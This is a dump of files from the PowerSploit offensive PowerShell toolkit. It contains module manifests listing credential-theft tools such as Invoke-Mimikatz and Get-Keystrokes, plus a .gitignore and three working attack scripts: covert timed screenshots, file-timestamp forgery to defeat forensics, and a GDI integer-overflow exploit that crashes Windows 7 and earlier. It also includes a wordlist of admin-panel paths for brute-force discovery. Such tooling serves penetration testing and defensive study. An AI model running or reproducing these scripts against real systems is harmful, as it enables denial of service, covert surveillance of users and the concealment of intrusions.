ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1', 77 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1', 78 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1' 79 | 80 | # Private data to pass to the module specified in RootModule/ModuleToProcess 81 | # PrivateData = '' 82 | 83 | # HelpInfo URI of this module 84 | # HelpInfoURI = '' 85 | 86 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 87 | # DefaultCommandPrefix = '' 88 | 89 | } 90 | -------------------------------------------------------------------------------- /PETools/PETools.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'PETools.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'd15059e2-8bd9-47ff-8bcd-b708ff90e402' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Portable Executable Analysis Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | FormatsToProcess = 'PETools.format.ps1xml', 'Get-ObjDump.format.ps1xml', 'Get-LibSymbols.format.ps1xml' 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'PETools'; ModuleVersion = '1.0.0.0'; GUID = 'd15059e2-8bd9-47ff-8bcd-b708ff90e402'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'PETools.psm1', 'PETools.psd1', 'PETools.format.ps1xml', 'Get-DllLoadPath.ps1', 77 | 'Get-PEHeader.ps1', 'Get-ObjDump.ps1', 'Get-ObjDump.format.ps1xml', 'Get-LibSymbols.ps1', 78 | 'Usage.md' 79 | 80 | # Private data to pass to the module specified in RootModule/ModuleToProcess 81 | # PrivateData = '' 82 | 83 | # HelpInfo URI of this module 84 | # HelpInfoURI = '' 85 | 86 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 87 | # DefaultCommandPrefix = '' 88 | 89 | } 90 | -------------------------------------------------------------------------------- /ReverseEngineering/ReverseEngineering.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'ReverseEngineering.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'cbffaf47-c55a-4901-92e7-8d794fbe1fff' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Reverse Engineering Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | FormatsToProcess = 'Get-PEB.format.ps1xml', 'Get-NtSystemInformation.format.ps1xml', 'Get-ILDisassembly.format.ps1xml', 'ProcessModuleTrace.format.ps1xml' 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @(@{ModuleName = 'ReverseEngineering'; ModuleVersion = '1.0.0.0'; GUID = 'cbffaf47-c55a-4901-92e7-8d794fbe1fff'}) 74 | 75 | # List of all files packaged with this module 76 | FileList = 'ReverseEngineering.psm1', 'ReverseEngineering.psd1', 'Get-ILDisassembly.ps1', 'Get-NtSystemInformation.format.ps1xml', 77 | 'Get-NtSystemInformation.ps1', 'Get-Member.ps1', 'Get-MethodAddress.ps1', 'Get-PEB.format.ps1xml', 78 | 'Get-PEB.ps1', 'Get-Strings.ps1', 'Get-StructFromMemory.ps1', 'ConvertTo-String.ps1', 79 | 'Get-Entropy.ps1', 'New-Object.ps1', 'Get-ILDisassembly.format.ps1xml', 'ProcessModuleTrace.ps1', 'Usage.md' 80 | 81 | # Private data to pass to the module specified in RootModule/ModuleToProcess 82 | # PrivateData = '' 83 | 84 | # HelpInfo URI of this module 85 | # HelpInfoURI = '' 86 | 87 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 88 | # DefaultCommandPrefix = '' 89 | 90 | } 91 | 92 | -------------------------------------------------------------------------------- /Exfiltration/Get-TimedScreenshot.ps1: -------------------------------------------------------------------------------- 1 | function Get-TimedScreenshot 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Takes screenshots at a regular interval and saves them to disk. 7 | 8 | PowerSploit Function: Get-TimedScreenshot 9 | Author: Chris Campbell (@obscuresec) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | A function that takes screenshots and saves them to a folder. 17 | 18 | .PARAMETER Path 19 | 20 | Specifies the folder path. 21 | 22 | .PARAMETER Interval 23 | 24 | Specifies the interval in seconds between taking screenshots. 25 | 26 | .PARAMETER EndTime 27 | 28 | Specifies when the script should stop running in the format HH-MM 29 | 30 | .EXAMPLE 31 | 32 | PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00 33 | 34 | .LINK 35 | 36 | http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html 37 | https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1 38 | #> 39 | 40 | [CmdletBinding()] Param( 41 | [Parameter(Mandatory=$True)] 42 | [ValidateScript({Test-Path -Path $_ })] 43 | [String] $Path, 44 | 45 | [Parameter(Mandatory=$True)] 46 | [Int32] $Interval, 47 | 48 | [Parameter(Mandatory=$True)] 49 | [String] $EndTime 50 | ) 51 | 52 | #Define helper function that generates and saves screenshot 53 | Function Get-Screenshot { 54 | $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen 55 | $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height 56 | $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject) 57 | $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size) 58 | $DrawingGraphics.Dispose() 59 | $ScreenshotObject.Save($FilePath) 60 | $ScreenshotObject.Dispose() 61 | } 62 | 63 | Try { 64 | 65 | #load required assembly 66 | Add-Type -Assembly System.Windows.Forms 67 | 68 | Do { 69 | #get the current time and build the filename from it 70 | $Time = (Get-Date) 71 | 72 | [String] $FileName = "$($Time.Month)" 73 | $FileName += '-' 74 | $FileName += "$($Time.Day)" 75 | $FileName += '-' 76 | $FileName += "$($Time.Year)" 77 | $FileName += '-' 78 | $FileName += "$($Time.Hour)" 79 | $FileName += '-' 80 | $FileName += "$($Time.Minute)" 81 | $FileName += '-' 82 | $FileName += "$($Time.Second)" 83 | $FileName += '.png' 84 | 85 | #use join-path to add path to filename 86 | [String] $FilePath = (Join-Path $Path $FileName) 87 | 88 | #run screenshot function 89 | Get-Screenshot 90 | 91 | Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds" 92 | 93 | Start-Sleep -Seconds $Interval 94 | } 95 | 96 | #note that this will run once regardless if the specified time as passed 97 | While ((Get-Date -Format HH:mm) -lt $EndTime) 98 | } 99 | 100 | Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage} 101 | } 102 | -------------------------------------------------------------------------------- /Staging/Get-MacAttribute.ps1: -------------------------------------------------------------------------------- 1 | function Set-MacAttribute { 2 | <# 3 | .SYNOPSIS 4 | 5 | Sets the modified, accessed and created (Mac) attributes for a file based on another file or input. 6 | 7 | PowerSploit Function: Set-MacAttribute 8 | Author: Chris Campbell (@obscuresec) 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | Version: 1.0.0 13 | 14 | .DESCRIPTION 15 | 16 | Set-MacAttribute sets one or more Mac attributes and returns the new attribute values of the file. 17 | 18 | .EXAMPLE 19 | 20 | PS C:\> Set-MacAttribute -FilePath c:\test\newfile -OldFilePath c:\test\oldfile 21 | 22 | .EXAMPLE 23 | 24 | PS C:\> Set-MacAttribute -FilePath c:\demo\test.xt -All "01/03/2006 12:12 pm" 25 | 26 | .EXAMPLE 27 | 28 | PS C:\> Set-MacAttribute -FilePath c:\demo\test.txt -Modified "01/03/2006 12:12 pm" -Accessed "01/03/2006 12:11 pm" -Created "01/03/2006 12:10 pm" 29 | 30 | .LINK 31 | 32 | http://www.obscuresec.com 33 | https://github.com/mattifestation/PowerSploit/blob/master/ 34 | #> 35 | [CmdletBinding(DefaultParameterSetName = 'Touch')] 36 | Param ( 37 | 38 | [Parameter(Position = 1,Mandatory = $True)] 39 | [ValidateNotNullOrEmpty()] 40 | [String] 41 | $FilePath, 42 | 43 | [Parameter(ParameterSetName = 'Touch')] 44 | [ValidateNotNullOrEmpty()] 45 | [String] 46 | $OldFilePath, 47 | 48 | [Parameter(ParameterSetName = 'Individual')] 49 | [DateTime] 50 | $Modified, 51 | 52 | [Parameter(ParameterSetName = 'Individual')] 53 | [DateTime] 54 | $Accessed, 55 | 56 | [Parameter(ParameterSetName = 'Individual')] 57 | [DateTime] 58 | $Created, 59 | 60 | [Parameter(ParameterSetName = 'All')] 61 | [DateTime] 62 | $AllMacAttributes 63 | ) 64 | 65 | Set-StrictMode -Version 2.0 66 | 67 | #Helper function that returns an object with the MAC attributes of a file. 68 | function Get-MacAttribute { 69 | 70 | param($OldFileName) 71 | 72 | if (!(Test-Path $OldFileName)){Throw "File Not Found"} 73 | $FileInfoObject = (Get-Item $OldFileName) 74 | 75 | $ObjectProperties = @{'Modified' = ($FileInfoObject.LastWriteTime); 76 | 'Accessed' = ($FileInfoObject.LastAccessTime); 77 | 'Created' = ($FileInfoObject.CreationTime)}; 78 | $ResultObject = New-Object -TypeName PSObject -Property $ObjectProperties 79 | Return $ResultObject 80 | } 81 | 82 | #test and set variables 83 | if (!(Test-Path $FilePath)){Throw "$FilePath not found"} 84 | 85 | $FileInfoObject = (Get-Item $FilePath) 86 | 87 | if ($PSBoundParameters['All']){ 88 | $Modified = $AllMacAttributes 89 | $Accessed = $AllMacAttributes 90 | $Created = $AllMacAttributes 91 | } 92 | 93 | if ($PSBoundParameters['OldFilePath']){ 94 | 95 | if (!(Test-Path $OldFilePath)){Write-Error "$OldFilePath not found."} 96 | 97 | $CopyFileMac = (Get-MacAttribute $OldFilePath) 98 | $Modified = $CopyFileMac.Modified 99 | $Accessed = $CopyFileMac.Accessed 100 | $Created = $CopyFileMac.Created 101 | } 102 | 103 | if ($Modified) {$FileInfoObject.LastWriteTime = $Modified} 104 | if ($Accessed) {$FileInfoObject.LastAccessTime = $Accessed} 105 | if ($Created) {$FileInfoObject.CreationTime = $Created} 106 | 107 | Return (Get-MacAttribute $FilePath) 108 | } 109 | -------------------------------------------------------------------------------- /CodeExecution/Watch-BlueScreen.ps1: -------------------------------------------------------------------------------- 1 | function Watch-BlueScreen 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Cause a blue screen to occur (Windows 7 and below). 7 | 8 | PowerSploit Function: Watch-BlueScreen 9 | Author: Matthew Graeber (@mattifestation) 10 | Original Research: Tavis Ormandy and Nikita Tarakanov 11 | License: BSD 3-Clause 12 | Required Dependencies: None 13 | Optional Dependencies: None 14 | 15 | .NOTES 16 | 17 | Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov 18 | ?tweeted this technique on 5/13/2013. 19 | 20 | .LINK 21 | 22 | https://gist.github.com/taviso/4658638 23 | http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html 24 | https://twitter.com/NTarakanov/status/334031968465453057 25 | #> 26 | [CmdletBinding( ConfirmImpact = 'High')] Param () 27 | 28 | try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException] 29 | { 30 | $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD') 31 | $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run') 32 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False) 33 | $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class') 34 | 35 | $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) 36 | $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') 37 | $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'), 38 | [Reflection.FieldInfo[]]@($SetLastError), @($true)) 39 | 40 | $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC', 41 | 'Gdi32.dll', 42 | 'Public, Static', 43 | 'Standard', 44 | [IntPtr], 45 | @([IntPtr]), 46 | 'Winapi', 47 | 'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute) 48 | 49 | $TypeBuilder.DefinePInvokeMethod( 'SetLayout', 50 | 'Gdi32.dll', 51 | 'Public, Static', 52 | 'Standard', 53 | [UInt32], 54 | @([IntPtr], [UInt32]), 55 | 'Winapi', 56 | 'Auto' ) | Out-Null 57 | 58 | $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx', 59 | 'Gdi32.dll', 60 | 'Public, Static', 61 | 'Standard', 62 | [Bool], 63 | @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]), 64 | 'Winapi', 65 | 'Auto' ) | Out-Null 66 | 67 | $Gdi32 = $TypeBuilder.CreateType() 68 | } 69 | 70 | $LAYOUT_RTL = 1 71 | 72 | if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' )) 73 | { 74 | $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero) 75 | $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null 76 | $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ################# 2 | ## Eclipse 3 | ################# 4 | 5 | *.pydevproject 6 | .project 7 | .metadata 8 | bin/ 9 | tmp/ 10 | *.tmp 11 | *.bak 12 | *.swp 13 | *~.nib 14 | local.properties 15 | .classpath 16 | .settings/ 17 | .loadpath 18 | 19 | # External tool builders 20 | .externalToolBuilders/ 21 | 22 | # Locally stored "Eclipse launch configurations" 23 | *.launch 24 | 25 | # CDT-specific 26 | .cproject 27 | 28 | # PDT-specific 29 | .buildpath 30 | 31 | 32 | ################# 33 | ## Visual Studio 34 | ################# 35 | 36 | ## Ignore Visual Studio temporary files, build results, and 37 | ## files generated by popular Visual Studio add-ons. 38 | 39 | # User-specific files 40 | *.suo 41 | *.user 42 | *.sln.docstates 43 | 44 | # Build results 45 | 46 | [Dd]ebug/ 47 | [Rr]elease/ 48 | build/ 49 | [Bb]in/ 50 | [Oo]bj/ 51 | 52 | # MSTest test Results 53 | [Tt]est[Rr]esult*/ 54 | [Bb]uild[Ll]og.* 55 | 56 | *_i.c 57 | *_p.c 58 | *.ilk 59 | *.meta 60 | *.obj 61 | *.pch 62 | *.pdb 63 | *.pgc 64 | *.pgd 65 | *.rsp 66 | *.sbr 67 | *.tlb 68 | *.tli 69 | *.tlh 70 | *.tmp 71 | *.tmp_proj 72 | *.log 73 | *.vspscc 74 | *.vssscc 75 | .builds 76 | *.pidb 77 | *.log 78 | *.scc 79 | 80 | # Visual C++ cache files 81 | ipch/ 82 | *.aps 83 | *.ncb 84 | *.opensdf 85 | *.sdf 86 | *.cachefile 87 | 88 | # Visual Studio profiler 89 | *.psess 90 | *.vsp 91 | *.vspx 92 | 93 | # Guidance Automation Toolkit 94 | *.gpState 95 | 96 | # ReSharper is a .NET coding add-in 97 | _ReSharper*/ 98 | *.[Rr]e[Ss]harper 99 | 100 | # TeamCity is a build add-in 101 | _TeamCity* 102 | 103 | # DotCover is a Code Coverage Tool 104 | *.dotCover 105 | 106 | # NCrunch 107 | *.ncrunch* 108 | .*crunch*.local.xml 109 | 110 | # Installshield output folder 111 | [Ee]xpress/ 112 | 113 | # DocProject is a documentation generator add-in 114 | DocProject/buildhelp/ 115 | DocProject/Help/*.HxT 116 | DocProject/Help/*.HxC 117 | DocProject/Help/*.hhc 118 | DocProject/Help/*.hhk 119 | DocProject/Help/*.hhp 120 | DocProject/Help/Html2 121 | DocProject/Help/html 122 | 123 | # Click-Once directory 124 | publish/ 125 | 126 | # Publish Web Output 127 | *.Publish.xml 128 | *.pubxml 129 | 130 | # NuGet Packages Directory 131 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line 132 | #packages/ 133 | 134 | # Windows Azure Build Output 135 | csx 136 | *.build.csdef 137 | 138 | # Windows Store app package directory 139 | AppPackages/ 140 | 141 | # Others 142 | sql/ 143 | *.Cache 144 | ClientBin/ 145 | [Ss]tyle[Cc]op.* 146 | ~$* 147 | *~ 148 | *.dbmdl 149 | *.[Pp]ublish.xml 150 | *.pfx 151 | *.publishsettings 152 | 153 | # RIA/Silverlight projects 154 | Generated_Code/ 155 | 156 | # Backup & report files from converting an old project file to a newer 157 | # Visual Studio version. Backup files are not needed, because we have git ;-) 158 | _UpgradeReport_Files/ 159 | Backup*/ 160 | UpgradeLog*.XML 161 | UpgradeLog*.htm 162 | 163 | # SQL Server files 164 | App_Data/*.mdf 165 | App_Data/*.ldf 166 | 167 | ############# 168 | ## Windows detritus 169 | ############# 170 | 171 | # Windows image file caches 172 | Thumbs.db 173 | ehthumbs.db 174 | 175 | # Folder config file 176 | Desktop.ini 177 | 178 | # Recycle Bin used on file shares 179 | $RECYCLE.BIN/ 180 | 181 | # Mac crap 182 | .DS_Store 183 | 184 | 185 | ############# 186 | ## Python 187 | ############# 188 | 189 | *.py[co] 190 | 191 | # Packages 192 | *.egg 193 | *.egg-info 194 | dist/ 195 | build/ 196 | eggs/ 197 | parts/ 198 | var/ 199 | sdist/ 200 | develop-eggs/ 201 | .installed.cfg 202 | 203 | # Installer logs 204 | pip-log.txt 205 | 206 | # Unit test / coverage reports 207 | .coverage 208 | .tox 209 | 210 | #Translations 211 | *.mo 212 | 213 | #Mr Developer 214 | .mr.developer.cfg 215 | -------------------------------------------------------------------------------- /PowerSploit.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'PowerSploit.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '1.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '6753b496-d842-40a3-924a-0f09e248640c' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Root Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Name of the Windows PowerShell host required by this module 28 | # PowerShellHostName = '' 29 | 30 | # Minimum version of the Windows PowerShell host required by this module 31 | # PowerShellHostVersion = '' 32 | 33 | # Minimum version of the .NET Framework required by this module 34 | # DotNetFrameworkVersion = '' 35 | 36 | # Minimum version of the common language runtime (CLR) required by this module 37 | # CLRVersion = '' 38 | 39 | # Processor architecture (None, X86, Amd64) required by this module 40 | # ProcessorArchitecture = '' 41 | 42 | # Modules that must be imported into the global environment prior to importing this module 43 | # RequiredModules = @() 44 | 45 | # Assemblies that must be loaded prior to importing this module 46 | # RequiredAssemblies = @() 47 | 48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module. 49 | # ScriptsToProcess = '' 50 | 51 | # Type files (.ps1xml) to be loaded when importing this module 52 | # TypesToProcess = @() 53 | 54 | # Format files (.ps1xml) to be loaded when importing this module 55 | # FormatsToProcess = @() 56 | 57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess 58 | # NestedModules = @() 59 | 60 | # Functions to export from this module 61 | FunctionsToExport = '*' 62 | 63 | # Cmdlets to export from this module 64 | CmdletsToExport = '*' 65 | 66 | # Variables to export from this module 67 | VariablesToExport = '' 68 | 69 | # Aliases to export from this module 70 | AliasesToExport = '' 71 | 72 | # List of all modules packaged with this module. 73 | ModuleList = @( @{ModuleName = 'PowerSploit'; ModuleVersion = '1.0.0.0'; GUID = '6753b496-d842-40a3-924a-0f09e248640c'}, 74 | @{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'}, 75 | @{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'}, 76 | @{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}, 77 | @{ModuleName = 'PETools'; ModuleVersion = '1.0.0.0'; GUID = 'd15059e2-8bd9-47ff-8bcd-b708ff90e402'}, 78 | @{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}, 79 | @{ModuleName = 'ReverseEngineering'; ModuleVersion = '1.0.0.0'; GUID = 'cbffaf47-c55a-4901-92e7-8d794fbe1fff'}, 80 | @{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, 81 | @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'} 82 | @{ModuleName = 'Capstone'; ModuleVersion = '1.0.0.0'; GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b'} 83 | ) 84 | 85 | # List of all files packaged with this module 86 | FileList = 'PowerSploit.psd1', 'PowerSploit.psm1' 87 | 88 | # Private data to pass to the module specified in RootModule/ModuleToProcess 89 | # PrivateData = '' 90 | 91 | # HelpInfo URI of this module 92 | # HelpInfoURI = '' 93 | 94 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. 95 | # DefaultCommandPrefix = '' 96 | 97 | } 98 | -------------------------------------------------------------------------------- /Recon/Dictionaries/admin.txt: -------------------------------------------------------------------------------- 1 | admin1.php 2 | admin.asp 3 | admin/account.asp 4 | admin/account.html 5 | admin/account.php 6 | admin/controlpanel.asp 7 | admin/controlpanel.html 8 | admin/controlpanel.php 9 | admin/cp.asp 10 | admin/cp.html 11 | admin/cp.php 12 | admin/home.asp 13 | admin/home.php 14 | admin/index.asp 15 | admin/index.html 16 | admin/login.asp 17 | admin/login.html 18 | admin/login.php 19 | admin1.asp 20 | admin1.html 21 | admin1/ 22 | admin2.asp 23 | admin2.html 24 | admin2.php 25 | admin4_account/ 26 | admin4_colon/ 27 | admincontrol.asp 28 | admincontrol.html 29 | admincontrol.php 30 | administer/ 31 | administr8.asp 32 | administr8.html 33 | administr8.php 34 | administr8/ 35 | administracao.php 36 | administracao/ 37 | administracion.php 38 | administracion/ 39 | administrateur.php 40 | administrateur/ 41 | administratie/ 42 | administration.html 43 | administration.php 44 | administration/ 45 | administrator.asp 46 | administrator.html 47 | administrator.php 48 | administrator/account.asp 49 | administrator/account.html 50 | administrator/account.php 51 | administrator/index.asp 52 | administrator/index.html 53 | administrator/index.php 54 | administrator/login.asp 55 | administrator/login.html 56 | administrator/login.php 57 | administratoraccounts/ 58 | administrators/ 59 | administrivia/ 60 | adminpanel.asp 61 | adminpanel.html 62 | adminpanel.php 63 | adminpro/ 64 | admins.asp 65 | admins.html 66 | admins.php 67 | admins/ 68 | AdminTools/ 69 | amministratore.php 70 | amministratore/ 71 | autologin/ 72 | banneradmin/ 73 | bbadmin/ 74 | beheerder.php 75 | beheerder/ 76 | bigadmin/ 77 | blogindex/ 78 | cadmins/ 79 | ccms/ 80 | ccms/index.php 81 | ccms/login.php 82 | ccp14admin/ 83 | cmsadmin/ 84 | configuration/ 85 | configure/ 86 | controlpanel.asp 87 | controlpanel.html 88 | controlpanel.php 89 | controlpanel/ 90 | cp.asp 91 | cp.html 92 | cp.php 93 | cpanel_file/ 94 | customer_login/ 95 | database_administration/ 96 | Database_Administration/ 97 | dir-login/ 98 | directadmin/ 99 | ezsqliteadmin/ 100 | fileadmin.asp 101 | fileadmin.html 102 | fileadmin.php 103 | formslogin/ 104 | globes_admin/ 105 | hpwebjetadmin/ 106 | Indy_admin/ 107 | irc-macadmin/ 108 | LiveUser_Admin/ 109 | login_db/ 110 | login-redirect/ 111 | login-us/ 112 | login.asp 113 | login.html 114 | login.php 115 | login1/ 116 | loginflat/ 117 | logo_sysadmin/ 118 | Lotus_Domino_Admin/ 119 | macadmin/ 120 | maintenance/ 121 | manuallogin/ 122 | memlogin/ 123 | meta_login/ 124 | modelsearch/login.asp 125 | modelsearch/login.php 126 | moderator.asp 127 | moderator.html 128 | moderator.php 129 | moderator/ 130 | moderator/admin.asp 131 | moderator/admin.html 132 | moderator/admin.php 133 | moderator/login.asp 134 | moderator/login.html 135 | moderator/login.php 136 | myadmin/ 137 | navSiteAdmin/ 138 | newsadmin/ 139 | openvpnadmin/ 140 | painel/ 141 | panel/ 142 | pgadmin/ 143 | phpldapadmin/ 144 | phppgadmin/ 145 | phpSQLiteAdmin/ 146 | platz_login/ 147 | power_user/ 148 | project-admins/ 149 | pureadmin/ 150 | radmind-1/ 151 | radmind/ 152 | rcLogin/ 153 | server_admin_small/ 154 | Server.asp 155 | Server.html 156 | Server.php 157 | ServerAdministrator/ 158 | showlogin/ 159 | simpleLogin/ 160 | smblogin/ 161 | sql-admin/ 162 | ss_vms_admin_sm/ 163 | sshadmin/ 164 | staradmin/ 165 | sub-login/ 166 | Super-Admin/ 167 | support_login/ 168 | sys-admin/ 169 | sysadmin.asp 170 | sysadmin.html 171 | sysadmin.php 172 | sysadmin/ 173 | SysAdmin/ 174 | SysAdmin2/ 175 | sysadmins/ 176 | system_administration/ 177 | system-administration/ 178 | ur-admin.asp 179 | ur-admin.html 180 | ur-admin.php 181 | ur-admin/ 182 | useradmin/ 183 | UserLogin/ 184 | utility_login/ 185 | v2/painel/ 